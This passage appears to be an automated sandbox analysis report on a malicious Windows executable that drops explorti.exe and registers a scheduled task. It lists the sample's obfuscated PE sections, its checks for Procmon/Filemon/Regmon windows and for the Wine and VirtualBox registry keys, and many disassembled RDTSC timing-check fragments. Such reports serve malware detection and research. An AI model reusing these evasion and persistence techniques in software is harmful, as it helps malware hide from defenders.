                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                  Source: 11NdzR12PS.exeStatic file information: File size 1921536 > 1048576
                  Source: 11NdzR12PS.exeStatic PE information: Raw size of wokugkrf is bigger than: 0x100000 < 0x1a3800

                  Data Obfuscation

                  barindex
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeUnpacked PE file: 0.2.11NdzR12PS.exe.d30000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 1.2.explorti.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeUnpacked PE file: 5.2.explorti.exe.690000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wokugkrf:EW;csqdmnjl:EW;.taggant:EW;
                  Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                  Source: explorti.exe.0.drStatic PE information: real checksum: 0x1db077 should be: 0x1e273f
                  Source: 11NdzR12PS.exeStatic PE information: real checksum: 0x1db077 should be: 0x1e273f
                  Source: 11NdzR12PS.exeStatic PE information: section name:
                  Source: 11NdzR12PS.exeStatic PE information: section name: .idata
                  Source: 11NdzR12PS.exeStatic PE information: section name:
                  Source: 11NdzR12PS.exeStatic PE information: section name: wokugkrf
                  Source: 11NdzR12PS.exeStatic PE information: section name: csqdmnjl
                  Source: 11NdzR12PS.exeStatic PE information: section name: .taggant
                  Source: explorti.exe.0.drStatic PE information: section name:
                  Source: explorti.exe.0.drStatic PE information: section name: .idata
                  Source: explorti.exe.0.drStatic PE information: section name:
                  Source: explorti.exe.0.drStatic PE information: section name: wokugkrf
                  Source: explorti.exe.0.drStatic PE information: section name: csqdmnjl
                  Source: explorti.exe.0.drStatic PE information: section name: .taggant
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 5_2_006AD84C push ecx; ret 5_2_006AD85F
                  Source: 11NdzR12PS.exeStatic PE information: section name: entropy: 7.980756696745502
                  Source: 11NdzR12PS.exeStatic PE information: section name: wokugkrf entropy: 7.954605137442367
                  Source: explorti.exe.0.drStatic PE information: section name: entropy: 7.980756696745502
                  Source: explorti.exe.0.drStatic PE information: section name: wokugkrf entropy: 7.954605137442367
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeFile created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonClassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: RegmonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: FilemonclassJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeFile created: C:\Windows\Tasks\explorti.jobJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: D9F1B3 second address: D9F1B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: D9F1B8 second address: D9F1BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: D9F1BD second address: D9F1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F21A70 second address: F21A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F21A76 second address: F21A7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F21A7B second address: F21ABA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 jmp 00007FF3408102FBh 0x0000000c popad 0x0000000d jmp 00007FF340810303h 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ecx 0x00000015 jmp 00007FF3408102FCh 0x0000001a push eax 0x0000001b push edx 0x0000001c ja 00007FF3408102F6h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F21ABA second address: F21ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F21ABE second address: F21AC8 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF3408102F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F04D6D second address: F04D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F2099B second address: F209A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F209A1 second address: F209F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jng 00007FF34080AB2Dh 0x0000000b jmp 00007FF34080AB18h 0x00000010 jmp 00007FF34080AB0Fh 0x00000015 pushad 0x00000016 jmp 00007FF34080AB19h 0x0000001b push eax 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F20CCC second address: F20CE6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810300h 0x00000007 jo 00007FF3408102FCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F21047 second address: F2107B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB0Fh 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FF34080AB10h 0x00000010 jmp 00007FF34080AB0Eh 0x00000015 popad 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F2107B second address: F210AC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FF3408102FEh 0x00000008 jno 00007FF340810302h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007FF3408102F6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F210AC second address: F210BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007FF34080AB0Eh 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F210BF second address: F210C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F210C5 second address: F210C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F24838 second address: F2483E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F2483E second address: F24846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F2487A second address: F24884 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FF3408102FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F24884 second address: F2491C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007FF34080AB12h 0x0000000e jg 00007FF34080AB0Ch 0x00000014 mov dword ptr [ebp+122D1A07h], esi 0x0000001a push 00000000h 0x0000001c jmp 00007FF34080AB15h 0x00000021 call 00007FF34080AB09h 0x00000026 pushad 0x00000027 pushad 0x00000028 jno 00007FF34080AB06h 0x0000002e pushad 0x0000002f popad 0x00000030 popad 0x00000031 jmp 00007FF34080AB17h 0x00000036 popad 0x00000037 push eax 0x00000038 jnl 00007FF34080AB23h 0x0000003e pushad 0x0000003f jg 00007FF34080AB06h 0x00000045 jmp 00007FF34080AB15h 0x0000004a popad 0x0000004b mov eax, dword ptr [esp+04h] 0x0000004f push eax 0x00000050 push edx 0x00000051 push esi 0x00000052 pushad 0x00000053 popad 0x00000054 pop esi 0x00000055 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F2491C second address: F2496A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF340810308h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d push edx 0x0000000e pop edx 0x0000000f jmp 00007FF3408102FEh 0x00000014 popad 0x00000015 jmp 00007FF3408102FCh 0x0000001a popad 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FF3408102FAh 0x00000026 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F2496A second address: F249D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov edi, ebx 0x0000000c push 00000003h 0x0000000e add dl, 00000000h 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ecx 0x00000016 call 00007FF34080AB08h 0x0000001b pop ecx 0x0000001c mov dword ptr [esp+04h], ecx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc ecx 0x00000029 push ecx 0x0000002a ret 0x0000002b pop ecx 0x0000002c ret 0x0000002d sub ecx, dword ptr [ebp+122D2A56h] 0x00000033 push 00000003h 0x00000035 add dword ptr [ebp+122D2649h], edi 0x0000003b call 00007FF34080AB09h 0x00000040 push ebx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FF34080AB16h 0x00000048 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F249D5 second address: F249F0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FF3408102FFh 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F249F0 second address: F24A23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jng 00007FF34080AB10h 0x00000010 pushad 0x00000011 jnp 00007FF34080AB06h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 popad 0x0000001a mov eax, dword ptr [eax] 0x0000001c pushad 0x0000001d jmp 00007FF34080AB0Eh 0x00000022 push eax 0x00000023 push edx 0x00000024 ja 00007FF34080AB06h 0x0000002a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F24A23 second address: F24A42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF340810302h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F24A42 second address: F24A6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a mov dword ptr [ebp+122DB87Dh], edi 0x00000010 lea ebx, dword ptr [ebp+124597A9h] 0x00000016 mov ecx, dword ptr [ebp+122D2B4Eh] 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 push esi 0x00000022 pop esi 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F24A6C second address: F24A72 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F24A72 second address: F24A78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F24A78 second address: F24A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F24ABF second address: F24AD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF34080AB14h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F24AD7 second address: F24B58 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF3408102F8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D1B60h], edx 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FF3408102F8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000016h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f or dword ptr [ebp+122DB821h], edi 0x00000035 cld 0x00000036 call 00007FF3408102F9h 0x0000003b push ebx 0x0000003c jo 00007FF3408102F8h 0x00000042 pushad 0x00000043 popad 0x00000044 pop ebx 0x00000045 push eax 0x00000046 push edx 0x00000047 jne 00007FF3408102FCh 0x0000004d pop edx 0x0000004e mov eax, dword ptr [esp+04h] 0x00000052 push edi 0x00000053 jmp 00007FF340810309h 0x00000058 pop edi 0x00000059 mov eax, dword ptr [eax] 0x0000005b pushad 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F24D77 second address: F24D91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF34080AB16h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F46169 second address: F4616D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F4616D second address: F46171 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F46171 second address: F4617F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FF340810302h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F4617F second address: F461AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FF34080AB06h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jnp 00007FF34080AB0Ah 0x00000012 jmp 00007FF34080AB0Fh 0x00000017 jc 00007FF34080AB0Ch 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F44735 second address: F44739 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F44739 second address: F4473F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F449AE second address: F449B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F449B4 second address: F449C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF34080AB06h 0x0000000e jnp 00007FF34080AB06h 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F449C8 second address: F449E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF3408102FCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jo 00007FF3408102F8h 0x00000011 pushad 0x00000012 popad 0x00000013 push ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F449E5 second address: F449FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB10h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F449FE second address: F44A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FF3408102F6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F450B8 second address: F450C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F450C1 second address: F450C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F450C5 second address: F450CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F4520C second address: F45213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F45213 second address: F45227 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF34080AB0Dh 0x00000008 push edx 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F45374 second address: F45378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F45378 second address: F45395 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF34080AB13h 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F45395 second address: F4539B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F4539B second address: F453B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF34080AB12h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F45BCC second address: F45BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF340810307h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F45BEB second address: F45BF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FF34080AB06h 0x0000000a popad 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F4CFCE second address: F4CFD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F4D7CA second address: F4D7D4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FF34080AB06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\11NdzR12PS.exeRDTSC instruction interceptor: First address: F4E726 second address: F4E72E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
